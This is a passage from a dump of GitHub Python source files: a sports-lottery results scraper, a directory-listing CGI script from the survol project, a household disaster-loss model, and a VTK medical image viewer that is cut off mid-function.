r = requests.get(url + 'j3')\n soup = BeautifulSoup(r.text, \"html.parser\")\n rows += soup.tbody.find_all(\"tr\")\n r = requests.get(url + 'yn')\n soup = BeautifulSoup(r.text, \"html.parser\")\n for tbody in soup.find_all(\"tbody\"):\n rows += tbody.find_all(\"tr\")\n score = []\n status = []\n homes = []\n for t in range(len(toto)):\n for row in rows:\n atag = row.find_all(\"a\")\n if len(atag) > 1:\n home = atag[1].get_text()\n if home == toto['home'][t]:\n if atag[4].get_text() == toto['away'][t]:\n homes.append(home)\n score.append(row.find(\"td\", class_=\"score\").find('a').get_text().replace('\\xa0', ''))\n status.append(row.find('small', class_=\"status\").get_text())\n break\n toto[\"score\"] = score\n toto[\"status\"] = status\n result = []\n for t in range(len(toto)):\n if toto[\"score\"][t][0].isnumeric():\n score_h = int(toto[\"score\"][t][0])\n score_a = int(toto[\"score\"][t][-1])\n if score_h > score_a:\n result.append('1')\n elif score_h < score_a:\n result.append('2')\n else:\n result.append('0')\n else:\n result.append('-')\n toto[\"result\"] = result\n return toto\n\ndef get_scr_data(flag, now):\n \"\"\"\n * get scraping result\n \"\"\"\n toto = get_toto_info(flag, now)\n toto = get_match_info(toto)\n return toto\n\ndef cat_pred(toto, pred_list):\n \"\"\"\n * cat your prediction\n toto : game info pandas\n pred_list : your prediction list\n \"\"\"\n match_dict = {True : 'O', False : 'X'}\n if not pred_list:\n pred_list = ['_0_' for i in range(len(toto))]\n toto['prediction'] = pred_list\n match = []\n for i in range(len(toto)):\n match.append(toto[\"result\"][i] in toto[\"prediction\"][i].replace('_', ''))\n toto[\"match\"] = match\n n_match = str(toto[\"match\"].sum()) + '/' + str(len(toto[\"match\"]))\n toto[\"match\"] = toto[\"match\"].map(match_dict)\n toto = toto.loc[:, ['home', 'score', 'away', 'status', 'result', 'prediction', 'match']]\n return toto, n_match\n\nif __name__ == '__main__':\n toto, now = get_src_data('miniBIG')\n thtml = toto.to_html(classes='table', index=False)\n\n '''\n # 今の回を取ってくる\n if False:\n options = ChromeOptions()\n options.add_argument('--headless')\n driver = Chrome(options=options)\n url_index = 'https://www.toto-dream.com/toto/index.html'\n driver.get(url_index)\n soup = BeautifulSoup(driver.page_source, \"html.parser\")\n rows = soup.tbody.find_all('a')\n next = rows[0].get_text()[1:-1]\n now = str(int(next) - 1)\n driver.close()\n driver.quit()\n elif False:\n now = '1075'\n '''\n","repo_name":"jngt/toto_checker","sub_path":"app/scripts/scraping.py","file_name":"scraping.py","file_ext":"py","file_size_in_byte":5910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"25531385372","text":"#!/usr/bin/env python\n\n\"\"\"\nFiles in directory\n\"\"\"\n\nimport os\nimport re\nimport sys\nimport lib_uris\nimport lib_common\nfrom sources_types import CIM_DataFile\nimport lib_util\nfrom lib_properties import pc\n\n# If this is not a directory, should not be displayed.\ndef Usable(entity_type, entity_ids_arr):\n dirNam = entity_ids_arr[0]\n return os.path.isdir(dirNam)\n\n# This returns an url which displays a directory in HTML.\n# This can work only if the HTTP server allows so.\n# Purely experimental.\n# Apache option:\n# Alias /Maison \"C:/Users/rchateau\"\n# \n# Options +Indexes\n# \n#\n# Maybe read Apache configuration ? IIS also allows to browse a directory.\n#\n# Apache Icons: http://127.0.0.1/icons/folder.gif\n# http://127.0.0.1/icons/sound2.gif\n#\n# TODO: This is hard-coded, and should be replaced by a Python CGI server\n# serving this directory.\ndef UrlDirectory( fullDirPath ):\n # sys.stderr.write(\"UrlDirectory fullDirPath=%s\\n\" % fullDirPath)\n dirPrefix = \"C://Users/CurrentUser\"\n if fullDirPath.startswith(dirPrefix):\n shortPath = fullDirPath[ len(dirPrefix) : ]\n shortpathclean = shortPath.replace(\"&\",\"&\")\n dirUrl = \"http://127.0.0.1/Home/\" + shortpathclean\n return lib_common.NodeUrl(dirUrl)\n return None\n\n\n# Used only here.\ndef UriDirectoryDirectScript(dirNam):\n # sys.stderr.write(\"UriDirectoryDirectScript=%s\\n\"%dirNam)\n\n # This should rather have the property pc.property_script, but it must be listed with the files.\n return lib_uris.gUriGen.UriMakeFromScript(\n '/sources_types/CIM_Directory/file_directory.py',\n \"CIM_Directory\", # TODO: NOT SURE: lib_util.ComposeTypes(\"file\",\"dir\"),\n # pc.property_script,\n lib_util.EncodeUri(dirNam))\n\n\ndef Main():\n cgiEnv = lib_common.CgiEnv()\n filNam = cgiEnv.GetId()\n\n # Maybe this is a disk name, on Windows, such as \"A:\", \"C:\" etc...\n if lib_util.isPlatformWindows :\n # Remove the trailing backslash.\n if re.match(r\"^[a-zA-Z]:\\\\$\", filNam):\n filNam = filNam[:2]\n # Add a slash at the end, otherwise it does not work.\n if re.match(\"^[a-zA-Z]:$\", filNam):\n filNam += \"/\"\n\n filNode = lib_common.gUriGen.DirectoryUri(filNam)\n\n grph = cgiEnv.GetGraph()\n\n if lib_util.isPlatformLinux:\n isTopDirectory = filNam == '/'\n elif lib_util.isPlatformWindows:\n # Should be \"E:/\" but in case it would be \"E:\".\n isTopDirectory = (len(filNam) == 2 and filNam[1] == ':') or (len(filNam) == 3 and filNam[1:3] == ':/')\n else:\n isTopDirectory = False\n\n DEBUG(\"file_directory.py filNam=%s isTopDirectory=%d\", filNam, isTopDirectory)\n\n if not isTopDirectory:\n topdir = os.path.dirname(filNam)\n DEBUG(\"topdir=%s\", topdir)\n if topdir:\n topdirNode = lib_common.gUriGen.DirectoryUri(topdir)\n grph.add((topdirNode, pc.property_directory, filNode))\n\n url_mime = UriDirectoryDirectScript( topdir )\n grph.add((topdirNode, pc.property_rdf_data_nolist2, lib_common.NodeUrl(url_mime)))\n\n if os.path.isdir(filNam):\n # sys.stderr.write(\"filNam=%s\\n\"%(filNam))\n\n # In case we do not loop at all, the value must be set.\n dirs = None\n\n # This takes the list of files and directories of this directory, without recursing.\n for subdir, dirs, files in os.walk(filNam):\n break\n\n if dirs == None:\n lib_common.ErrorMessageHtml(\"No files in:\" + filNam)\n\n # Special case if top of the filesystem, on Linux.\n filNam_slash = filNam\n if filNam != \"/\":\n filNam_slash += \"/\"\n\n for one_directory in dirs:\n fullDirPath = filNam_slash + one_directory\n subdirNode = lib_common.gUriGen.DirectoryUri(fullDirPath.replace(\"&\",\"&\"))\n grph.add((filNode, pc.property_directory, subdirNode))\n\n url_dir_node = UrlDirectory(fullDirPath)\n if not url_dir_node is None:\n grph.add((subdirNode, pc.property_rdf_data_nolist1, url_dir_node))\n\n url_mime = UriDirectoryDirectScript(fullDirPath)\n grph.add((subdirNode, pc.property_rdf_data_nolist2, lib_common.NodeUrl(url_mime)))\n\n # TODO: If this is a script, checks if this is executable ?\n for one_file in files:\n fullFilePath = filNam_slash + one_file\n # First replace the ampersand, then encode.\n\n fullFilePath = lib_util.urllib_quote(fullFilePath, safe='/:! ')\n\n file_path_replace_encoded = fullFilePath.replace(\"&\", \"&\")\n\n # There might be non-ascii chars, accents etc...\n # filNam='C://Users/Yana\\xeblle \\xe0 la plage.jpg'\n # filNam='C://Users/Yanaelle a la plage.jpg'\n # Typical Graphviz error:\n # Error: not well-formed (invalid token) in line 1\n # ... Yana (e trema) lle et Constantin (a grave accent) Boulogne-sur-Mer.IMG-20190806-WA0000.jpg ...\n\n subfilNode = lib_common.gUriGen.FileUri(file_path_replace_encoded)\n\n grph.add((filNode, pc.property_directory, subfilNode))\n\n CIM_DataFile.AddStat(grph, subfilNode, fullFilePath)\n CIM_DataFile.AddHtml(grph, subfilNode, fullFilePath)\n\n cgiEnv.OutCgiRdf(\"LAYOUT_RECT\", [pc.property_directory])\n # cgiEnv.OutCgiRdf(\"LAYOUT_RECT\", [] )\n\nif __name__ == '__main__':\n Main()\n\n\n","repo_name":"Tiancheng-Luo/survol","sub_path":"survol/sources_types/CIM_Directory/file_directory.py","file_name":"file_directory.py","file_ext":"py","file_size_in_byte":5440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"}
+{"seq_id":"73572817386","text":"\"\"\"This module is the core of the model. \nIt contains a set of functions that are used to calculate the impact of a disaster on households.\"\"\"\n\n\nimport pandas as pd\nimport numpy as np\n\n\ndef match_assets_and_damage(households: pd.DataFrame, tot_exposed_asset: float, atol: bool) -> pd.DataFrame:\n '''Match assets and expenditure of to the asset damage data.\n\n There can be a mismatch between the asset stock in the household survey and the of the asset stock in the damage data.\n This function adjusts the asset stock and expenditure in the household survey to match the asset damage data.\n\n 1). `k_house_ae` is domicile value divided by the ratio of household expenditure to adult equivalent expenditure (per capita)\n `k_house_ae` = domicile_value / (`hhexp` / `aeexp`)\n 2). `aeexp` is adult equivalent expenditure (per capita)\n 3). `aeexp_house` is `hhexp_house` (household annual rent) / `hhsize_ae`, \n where `hhsize_ae` = `hhexp` / `aeexp`.\n\n Args:\n households (pd.DataFrame): Households.\n total_exposed_asset_stock (float): Total exposed asset stock from the damage data.\n indigence_line (float): Indigence line.\n atol (bool): Absolute tolerance for the comparison of the total exposed asset stock and the total asset stock in the survey.\n\n Returns:\n pd.DataFrame: Households with adjusted assets and expenditure.\n\n Raises:\n ValueError: If the total exposed asset stock is less than the total asset stock in the survey.\n '''\n\n # Get the total asset stock in the survey\n # In simple terms, k_house_ae is the price of a house\n tot_asset_surv = households[[\n 'wgt', 'k_house_ae']].prod(axis=1).sum()\n\n # If the difference is small, return the original households (default atol = 100,000)\n if np.isclose(tot_exposed_asset, tot_asset_surv, atol=atol):\n return households\n else:\n # Save the initial values\n households['k_house_ae_orig'] = households['k_house_ae']\n households['aeexp_orig'] = households['aeexp']\n households['aeexp_house_orig'] = households['aeexp_house']\n\n # Calculate the total asset in the survey\n households['tot_asset_surv'] = tot_asset_surv\n\n # Calculate the scaling factor and adjust the variables\n scaling_factor = tot_exposed_asset / tot_asset_surv\n included_variables = ['k_house_ae', 'aeexp', 'aeexp_house']\n households[included_variables] *= scaling_factor\n poverty_line = households['povline'].iloc[0]\n households['poverty_line_adjusted'] = poverty_line * scaling_factor\n\n # Check the result of the adjustment\n tot_asset_surv_adjusted = households[['wgt', 'k_house_ae']].prod(\n axis=1).sum()\n\n if not np.isclose(tot_exposed_asset, tot_asset_surv_adjusted, atol=1e1):\n raise ValueError(\n 'Total exposed asset stock is not equal to the total asset stock in the survey after adjustment.')\n\n return households\n\n\ndef calculate_pml(households: pd.DataFrame, expected_loss_frac: float) -> pd.DataFrame:\n '''Calculate the probable maximum loss (PML) of households in a district.\n\n PML here is a function of effective capital stock (`k_house_ae`) and expected loss fraction multiplied by the population weight of a household\n\n `k_house_ae` is domicile value divided by the ratio of household expenditure to adult equivalent expenditure (per capita)\n `k_house_ae` = domicile_value / (`hhexp` / `aeexp`)\n\n Args:\n households (pd.DataFrame): Households.\n expected_loss_frac (float): Expected loss fraction.\n\n Returns:\n pd.DataFrame: Households with calculated PML (`pml` column).\n '''\n households['keff'] = households['k_house_ae'].copy()\n district_pml = households[['wgt', 'keff']].prod(\n axis=1).sum() * expected_loss_frac\n\n # !: PML is the same for all households in a district\n households['pml'] = district_pml\n return households\n\n\ndef calculate_exposure(households: pd.DataFrame, poverty_bias: float, calc_exposure_params: dict) -> pd.DataFrame:\n '''Calculate the exposure of households.\n\n Exposure is a function of poverty bias, effective capital stock, \n vulnerability and probable maximum loss.\n\n Args:\n households (pd.DataFrame): Households.\n poverty_bias (float): Poverty bias.\n calc_exposure_params (dict): Parameters for calculating exposure function.\n\n Returns:\n pd.DataFrame: Households with calculated exposure (`fa` column).\n '''\n district_pml = households['pml'].iloc[0]\n\n # Random value for poverty bias\n if poverty_bias == 'random':\n if calc_exposure_params['pov_bias_rnd_distr'] == 'uniform':\n # default 0.5\n low = calc_exposure_params['pov_bias_rnd_low']\n # default 1.5\n high = calc_exposure_params['pov_bias_rnd_high']\n povbias = np.random.uniform(low, high)\n else:\n raise ValueError(\"Only uniform distribution is supported yet.\")\n else:\n povbias = poverty_bias\n\n # Set poverty bias to 1 for all households\n households['poverty_bias'] = 1\n\n # Set poverty bias to povbias for poor households\n households.loc[households['is_poor'] == True, 'poverty_bias'] = povbias\n\n delimiter = households[['keff', 'v', 'poverty_bias', 'wgt']].prod(\n axis=1).sum()\n\n fa0 = district_pml / delimiter\n\n households['fa'] = fa0 * households[['poverty_bias']]\n households.drop('poverty_bias', axis=1, inplace=True)\n return households\n\n\ndef identify_affected(households: pd.DataFrame, ident_affected_params: dict) -> tuple:\n '''Determines affected households.\n\n We assume that all households have the same probability of being affected, \n but based on `fa` value calculated in `calculate_exposure`.\n\n Args:\n households (pd.DataFrame): Households.\n ident_affected_params (dict): Parameters for determining affected households function.\n\n Returns:\n tuple: Households with `is_affected` and `asset_loss` columns.\n\n Raises:\n ValueError: If no mask was found.\n '''\n # Get PML, it is the same for all households\n district_pml = households['pml'].iloc[0]\n\n # Allow for a relatively small error\n delta = district_pml * ident_affected_params['delta_pct'] # default 0.025\n\n # Check if total asset is less than PML\n tot_asset_stock = households[['keff', 'wgt']].prod(axis=1).sum()\n if tot_asset_stock < district_pml:\n raise ValueError(\n 'Total asset stock is less than PML.')\n\n low = ident_affected_params['low'] # default 0\n high = ident_affected_params['high'] # default 1\n\n # Generate multiple boolean masks at once\n num_masks = ident_affected_params['num_masks'] # default 2000\n masks = np.random.uniform(\n low, high, (num_masks, households.shape[0])) <= households['fa'].values\n\n # Compute total_asset_loss for each mask\n asset_losses = (\n masks * households[['keff', 'v', 'wgt']].values.prod(axis=1)).sum(axis=1)\n\n # Find the first mask that yields a total_asset_loss within the desired range\n mask_index = np.where((asset_losses >= district_pml - delta) &\n (asset_losses <= district_pml + delta))\n\n # Raise an error if no mask was found\n if mask_index is None:\n raise ValueError(\n f'Cannot find affected households in {num_masks} iterations.')\n else:\n try:\n # Select the first mask that satisfies the condition\n mask_index = mask_index[0][0]\n except:\n print('mask_index: ', mask_index)\n\n chosen_mask = masks[mask_index]\n\n # Raise an error if no mask was found\n if len(chosen_mask) == 0:\n raise ValueError(\n f'Cannot find affected households in {num_masks} iterations.')\n\n # Assign the chosen mask to the 'is_affected' column of the DataFrame\n households['is_affected'] = chosen_mask\n\n # Save the asset loss for each household\n households['asset_loss'] = households.loc[households['is_affected'], [\n 'keff', 'v', 'wgt']].prod(axis=1)\n households['asset_loss'] = households['asset_loss'].fillna(0)\n\n # Check whether the total asset loss is within the desired range\n tot_asset_loss = households['asset_loss'].sum()\n if (tot_asset_loss < district_pml - delta) or (tot_asset_loss > district_pml + delta):\n raise ValueError(\n f'Total asset loss ({tot_asset_loss}) is not within the desired range.')\n\n return households\n","repo_name":"mikhailsirenko/unbreakable","sub_path":"unbreakable/modules/households.py","file_name":"households.py","file_ext":"py","file_size_in_byte":8534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"41074587355","text":"from vtk.util.vtkImageImportFromArray import *\nimport vtk\nimport numpy as np\nimport os\nimport pickle\n\n\nclass KeyPressInteractorStyle(vtk.vtkInteractorStyleTrackballCamera):\n def __init__(self, parent, viewer, *args, **kwargs):\n super(KeyPressInteractorStyle).__init__(*args, **kwargs)\n self.parent = vtk.vtkRenderWindowInteractor()\n if parent is not None:\n self.parent = parent\n\n # print('key press')\n self.AddObserver(\"KeyPressEvent\", viewer.keypressFun)\n\n\nclass MedicalImageWindow:\n\n def __init__(self):\n self.renWin = vtk.vtkRenderWindow()\n\n self.renWinInteractor = vtk.vtkRenderWindowInteractor()\n self.renWinInteractor.SetRenderWindow(self.renWin)\n\n self.renWin.SetSize(450, 300)\n\n self.camera = vtk.vtkCamera()\n\n pos = (0, 0, 1, 1)\n\n self.render = vtk.vtkRenderer()\n self.render.SetBackground(0.8, 0.8, 0.8)\n self.render.SetActiveCamera(self.camera)\n self.render.SetViewport(*pos)\n\n self.viewer = MedicalImageViewer(self.renWin, self.renWinInteractor, self.render)\n\n def startWindow(self):\n\n self.render.ResetCamera()\n self.renWin.AddRenderer(self.render)\n self.renWinInteractor.SetInteractorStyle(KeyPressInteractorStyle(None, self.viewer))\n self.renWin.Render()\n self.renWinInteractor.Start()\n\n self.renWinInteractor.GetRenderWindow().Finalize()\n self.renWinInteractor.TerminateApp()\n del self.render\n del self.renWin\n del self.renWinInteractor\n\n\nclass MedicalImageViewer:\n def __init__(self, renWin, renWinInteractor, render):\n self.renWin = renWin\n self.renWinInteractor = renWinInteractor\n self.render = render\n\n self.minGrayValue = 0\n self.maxGrayValue = 10\n\n self.currentMin, self.currentMax = self.minGrayValue, self.maxGrayValue\n\n self.volumeProperty_src = vtk.vtkVolumeProperty()\n self.volumeProperty_seg = vtk.vtkVolumeProperty()\n self.src_arr = vtkImageImportFromArray()\n self.seg_arr = vtkImageImportFromArray()\n self.extractVOI_src = vtk.vtkExtractVOI()\n self.extractVOI_seg = vtk.vtkExtractVOI()\n self.dims = []\n self.info = []\n self.slicesActors = []\n self.slicesMappers = []\n\n self.segOpacity = 0.2\n\n self.showImage = True\n self.showLabel = True\n\n def addSrc(self, numpyImage_src, spacing=(1.0, 1.0, 1.0)):\n \"\"\"\n :param numpyImage_src:\n :param spacing: z,y,x\n :return:\n \"\"\"\n # print(\"addSrc\")\n self.info.append('addSrc')\n # print('shape of data ', numpyImage_src.shape, \"reversed spacing\", tuple(reversed(spacing)))\n\n numpyImage_src = numpyImage_src.astype(np.float32) - np.min(numpyImage_src)\n numpyImage_src = self.maxGrayValue * numpyImage_src / np.max(numpyImage_src)\n # print('minValue, maxValue', self.minGrayValue, self.maxGrayValue)\n\n self.src_arr.SetArray(numpyImage_src)\n self.src_arr.SetDataSpacing(tuple(reversed(spacing)))\n self.src_arr.SetDataOrigin((0, 0, 0))\n self.src_arr.Update()\n\n tcfun = vtk.vtkPiecewiseFunction() # 不透明度传输函数---放在tfun\n tcfun.AddPoint(self.minGrayValue, 0.0)\n tcfun.AddPoint(self.maxGrayValue, 1.0)\n\n gradtfun = vtk.vtkPiecewiseFunction() # 梯度不透明度函数---放在gradtfun\n gradtfun.AddPoint(0.0, 0.3)\n gradtfun.AddPoint(0.2, 0.4)\n gradtfun.AddPoint(0.6, 0.6)\n gradtfun.AddPoint(1.0, 1.0)\n\n ctfun = vtk.vtkColorTransferFunction() # 颜色传输函数---放在ctfun\n # ctfun.AddRGBPoint(self.minGrayValue, 0.0, 0.0, 0.0)\n # ctfun.AddRGBPoint(self.maxGrayValue, 1.0, 1.0, 1.0)\n ctfun.AddRGBPoint(self.minGrayValue, 0.0, 0.0, 0.0)\n ctfun.AddRGBPoint(self.maxGrayValue, 0.6, 0.6, 0.6)\n\n outline = vtk.vtkOutlineFilter()\n outline.SetInputConnection(self.src_arr.GetOutputPort())\n outlineMapper = vtk.vtkPolyDataMapper()\n outlineMapper.SetInputConnection(outline.GetOutputPort())\n outlineActor = vtk.vtkActor()\n outlineActor.SetMapper(outlineMapper)\n\n self.dims = self.src_arr.GetOutput().GetDimensions()\n # print(self.dims)\n\n self.extractVOI_src.SetInputConnection(self.src_arr.GetOutputPort())\n self.extractVOI_src.SetVOI(0, self.dims[0] - 1, 0, self.dims[1] - 1, 0, self.dims[2] - 1)\n self.extractVOI_src.Update()\n\n # print(self.extractVOI_src.GetOutput().GetDimensions())\n\n volumeMapper_src = vtk.vtkGPUVolumeRayCastMapper()\n volumeMapper_src.SetInputData(self.extractVOI_src.GetOutput())\n\n self.volumeProperty_src.SetColor(ctfun)\n self.volumeProperty_src.SetScalarOpacity(tcfun)\n self.volumeProperty_src.SetGradientOpacity(gradtfun)\n self.volumeProperty_src.SetInterpolationTypeToLinear()\n self.volumeProperty_src.ShadeOn()\n\n render_volume = vtk.vtkVolume()\n render_volume.SetMapper(volumeMapper_src)\n render_volume.SetProperty(self.volumeProperty_src)\n\n # self.render.AddActor(outlineActor)\n self.render.AddVolume(render_volume)\n\n def addGrayScaleSliderToRender(self):\n # print(\"addGrayScaleSliderToRender\")\n self.info.append(\"addGrayScaleSliderToRender\")\n count = 1\n sliderRep_min = vtk.vtkSliderRepresentation2D()\n sliderRep_min.SetMinimumValue(self.minGrayValue)\n sliderRep_min.SetMaximumValue(self.maxGrayValue)\n sliderRep_min.SetValue(self.minGrayValue + 1)\n sliderRep_min.SetTitleText(\"minValue\")\n sliderRep_min.SetSliderLength(0.025)\n sliderRep_min.SetSliderWidth(0.05)\n sliderRep_min.SetEndCapLength(0.005)\n sliderRep_min.SetEndCapWidth(0.025)\n sliderRep_min.SetTubeWidth(0.0125)\n sliderRep_min.GetPoint1Coordinate().SetCoordinateSystemToNormalizedDisplay()\n sliderRep_min.GetPoint2Coordinate().SetCoordinateSystemToNormalizedDisplay()\n sliderRep_min.GetPoint1Coordinate().SetValue(1 - 0.05 * count, 0.05)\n sliderRep_min.GetPoint2Coordinate().SetValue(1 - 0.05 * count, 0.45)\n\n sliderWidget_min = vtk.vtkSliderWidget()\n sliderWidget_min.SetInteractor(self.renWinInteractor)\n sliderWidget_min.SetRepresentation(sliderRep_min)\n sliderWidget_min.SetCurrentRenderer(self.render)\n sliderWidget_min.SetAnimationModeToAnimate()\n\n sliderRep_max = vtk.vtkSliderRepresentation2D()\n sliderRep_max.SetMinimumValue(self.minGrayValue)\n sliderRep_max.SetMaximumValue(self.maxGrayValue)\n sliderRep_max.SetValue(self.maxGrayValue - 1)\n sliderRep_max.SetTitleText(\"maxValue\")\n sliderRep_max.SetSliderLength(0.025)\n sliderRep_max.SetSliderWidth(0.05)\n sliderRep_max.SetEndCapLength(0.005)\n sliderRep_max.SetEndCapWidth(0.025)\n sliderRep_max.SetTubeWidth(0.0125)\n sliderRep_max.GetPoint1Coordinate().SetCoordinateSystemToNormalizedDisplay()\n sliderRep_max.GetPoint2Coordinate().SetCoordinateSystemToNormalizedDisplay()\n sliderRep_max.GetPoint1Coordinate().SetValue(1 - 0.05 * count, 0.55)\n sliderRep_max.GetPoint2Coordinate().SetValue(1 - 0.05 * count, 0.95)\n\n sliderWidget_max = vtk.vtkSliderWidget()\n sliderWidget_max.SetInteractor(self.renWinInteractor)\n sliderWidget_max.SetRepresentation(sliderRep_max)\n sliderWidget_max.SetCurrentRenderer(self.render)\n sliderWidget_max.SetAnimationModeToAnimate()\n\n def update_minmax(obj, ev):\n minValue = sliderWidget_min.GetRepresentation().GetValue()\n maxValue = sliderWidget_max.GetRepresentation().GetValue()\n # # reset value\n if minValue >= maxValue:\n if obj == sliderWidget_max:\n sliderWidget_max.GetRepresentation().SetValue(max(maxValue, minValue + 0.01))\n elif obj == sliderWidget_min:\n sliderWidget_min.GetRepresentation().SetValue(min(maxValue - 0.01, minValue))\n minValue = sliderWidget_min.GetRepresentation().GetValue()\n maxValue = sliderWidget_max.GetRepresentation().GetValue()\n\n self.updateGrayScale(minValue, maxValue)\n\n sliderWidget_min.AddObserver(vtk.vtkCommand.InteractionEvent, update_minmax)\n sliderWidget_max.AddObserver(vtk.vtkCommand.InteractionEvent, update_minmax)\n\n sliderWidget_min.EnabledOn()\n sliderWidget_max.EnabledOn()\n\n def addSliceToRender(self):\n # print(\"addSliceToRender\")\n self.info.append(\"addSliceToRender\")\n sliceActor_i_min = vtk.vtkImageSlice()\n sliceMapper_i_min = vtk.vtkImageSliceMapper()\n sliceMapper_i_min.SetInputData(self.extractVOI_src.GetOutput())\n sliceMapper_i_min.SetOrientationToX()\n sliceMapper_i_min.SetSliceNumber(0)\n sliceActor_i_min.SetMapper(sliceMapper_i_min)\n\n sliceActor_j_min = vtk.vtkImageSlice()\n sliceMapper_j_min = vtk.vtkImageSliceMapper()\n sliceMapper_j_min.SetInputData(self.extractVOI_src.GetOutput())\n sliceMapper_j_min.SetOrientationToY()\n sliceMapper_j_min.SetSliceNumber(0)\n sliceActor_j_min.SetMapper(sliceMapper_j_min)\n\n sliceActor_k_min = vtk.vtkImageSlice()\n sliceMapper_k_min = vtk.vtkImageSliceMapper()\n sliceMapper_k_min.SetInputData(self.extractVOI_src.GetOutput())\n sliceMapper_k_min.SetOrientationToZ()\n sliceMapper_k_min.SetSliceNumber(0)\n sliceActor_k_min.SetMapper(sliceMapper_k_min)\n\n sliceActor_i_max = vtk.vtkImageSlice()\n sliceMapper_i_max = vtk.vtkImageSliceMapper()\n sliceMapper_i_max.SetInputData(self.extractVOI_src.GetOutput())\n sliceMapper_i_max.SetOrientationToX()\n sliceMapper_i_max.SetSliceNumber(self.dims[0])\n sliceActor_i_max.SetMapper(sliceMapper_i_max)\n\n sliceActor_j_max = vtk.vtkImageSlice()\n sliceMapper_j_max = vtk.vtkImageSliceMapper()\n sliceMapper_j_max.SetInputData(self.extractVOI_src.GetOutput())\n sliceMapper_j_max.SetOrientationToY()\n sliceMapper_j_max.SetSliceNumber(self.dims[1])\n sliceActor_j_max.SetMapper(sliceMapper_j_max)\n\n sliceActor_k_max = vtk.vtkImageSlice()\n sliceMapper_k_max = vtk.vtkImageSliceMapper()\n sliceMapper_k_max.SetInputData(self.extractVOI_src.GetOutput())\n sliceMapper_k_max.SetOrientationToZ()\n sliceMapper_k_max.SetSliceNumber(self.dims[2])\n sliceActor_k_max.SetMapper(sliceMapper_k_max)\n\n sliceActor_i_min.GetProperty().SetColorLevel(self.maxGrayValue / 2 + self.minGrayValue / 2)\n sliceActor_i_min.GetProperty().SetColorWindow(self.maxGrayValue - self.minGrayValue)\n sliceActor_j_min.GetProperty().SetColorLevel(self.maxGrayValue / 2 + self.minGrayValue / 2)\n sliceActor_j_min.GetProperty().SetColorWindow(self.maxGrayValue - self.minGrayValue)\n sliceActor_k_min.GetProperty().SetColorLevel(self.maxGrayValue / 2 + self.minGrayValue / 2)\n sliceActor_k_min.GetProperty().SetColorWindow(self.maxGrayValue - self.minGrayValue)\n\n sliceActor_i_max.GetProperty().SetColorLevel(self.maxGrayValue / 2 + self.minGrayValue / 2)\n sliceActor_i_max.GetProperty().SetColorWindow(self.maxGrayValue - self.minGrayValue)\n sliceActor_j_max.GetProperty().SetColorLevel(self.maxGrayValue / 2 + self.minGrayValue / 2)\n sliceActor_j_max.GetProperty().SetColorWindow(self.maxGrayValue - self.minGrayValue)\n sliceActor_k_max.GetProperty().SetColorLevel(self.maxGrayValue / 2 + self.minGrayValue / 2)\n sliceActor_k_max.GetProperty().SetColorWindow(self.maxGrayValue - self.minGrayValue)\n\n self.render.AddActor(sliceActor_i_min)\n self.render.AddActor(sliceActor_j_min)\n self.render.AddActor(sliceActor_k_min)\n self.render.AddActor(sliceActor_i_max)\n self.render.AddActor(sliceActor_j_max)\n self.render.AddActor(sliceActor_k_max)\n\n self.slicesActors = [sliceActor_i_min, sliceActor_j_min, sliceActor_k_min,\n sliceActor_i_max, sliceActor_j_max, sliceActor_k_max]\n self.slicesMappers = [sliceMapper_i_min, sliceMapper_j_min, sliceMapper_k_min,\n sliceMapper_i_max, sliceMapper_j_max, sliceMapper_k_max]\n\n def addCropSliderToRender(self):\n # print(\"addCropSliderToRender\")\n self.info.append(\"addCropSliderToRender\")\n\n def getCropSlider(dim_index, dim_size, render, renWinInteractor):\n sliderRep_min = vtk.vtkSliderRepresentation2D()\n sliderRep_min.SetMinimumValue(0)\n sliderRep_min.SetMaximumValue(dim_size - 1)\n sliderRep_min.SetValue(0)\n sliderRep_min.SetSliderLength(0.025)\n sliderRep_min.SetSliderWidth(0.025)\n sliderRep_min.SetEndCapLength(0.005)\n sliderRep_min.SetEndCapWidth(0.025)\n sliderRep_min.SetTubeWidth(0.0125)\n sliderRep_min.GetPoint1Coordinate().SetCoordinateSystemToNormalizedDisplay()\n sliderRep_min.GetPoint2Coordinate().SetCoordinateSystemToNormalizedDisplay()\n sliderRep_min.GetPoint1Coordinate().SetValue(0.05 * dim_index, 0.05)\n sliderRep_min.GetPoint2Coordinate().SetValue(0.05 * dim_index, 0.45)\n\n sliderWidget_min = vtk.vtkSliderWidget()\n sliderWidget_min.SetInteractor(renWinInteractor)\n sliderWidget_min.SetRepresentation(sliderRep_min)\n sliderWidget_min.SetCurrentRenderer(render)\n sliderWidget_min.SetAnimationModeToAnimate()\n\n sliderRep_max = vtk.vtkSliderRepresentation2D()\n sliderRep_max.SetMinimumValue(0)\n sliderRep_max.SetMaximumValue(dim_size - 1)\n sliderRep_max.SetValue(dim_size - 1)\n sliderRep_max.SetSliderLength(0.025)\n sliderRep_max.SetSliderWidth(0.025)\n sliderRep_max.SetEndCapLength(0.005)\n sliderRep_max.SetEndCapWidth(0.025)\n sliderRep_max.SetTubeWidth(0.0125)\n sliderRep_max.GetPoint1Coordinate().SetCoordinateSystemToNormalizedDisplay()\n sliderRep_max.GetPoint2Coordinate().SetCoordinateSystemToNormalizedDisplay()\n sliderRep_max.GetPoint1Coordinate().SetValue(0.05 * dim_index, 0.55)\n sliderRep_max.GetPoint2Coordinate().SetValue(0.05 * dim_index, 0.95)\n\n sliderWidget_max = vtk.vtkSliderWidget()\n sliderWidget_max.SetInteractor(renWinInteractor)\n sliderWidget_max.SetRepresentation(sliderRep_max)\n sliderWidget_max.SetCurrentRenderer(render)\n sliderWidget_max.SetAnimationModeToAnimate()\n\n return sliderWidget_min, sliderWidget_max\n\n def update_crop(obj, ev):\n # print(obj)\n dim1_minValue = dim1_sliderWidget_min.GetRepresentation().GetValue()\n dim1_maxValue = dim1_sliderWidget_max.GetRepresentation().GetValue()\n dim2_minValue = dim2_sliderWidget_min.GetRepresentation().GetValue()\n dim2_maxValue = dim2_sliderWidget_max.GetRepresentation().GetValue()\n dim3_minValue = dim3_sliderWidget_min.GetRepresentation().GetValue()\n dim3_maxValue = dim3_sliderWidget_max.GetRepresentation().GetValue()\n # # reset value\n if dim1_minValue >= dim1_maxValue:\n if obj == dim1_sliderWidget_max:\n dim1_sliderWidget_max.GetRepresentation().SetValue(max(dim1_maxValue, dim1_minValue + 1))\n elif obj == 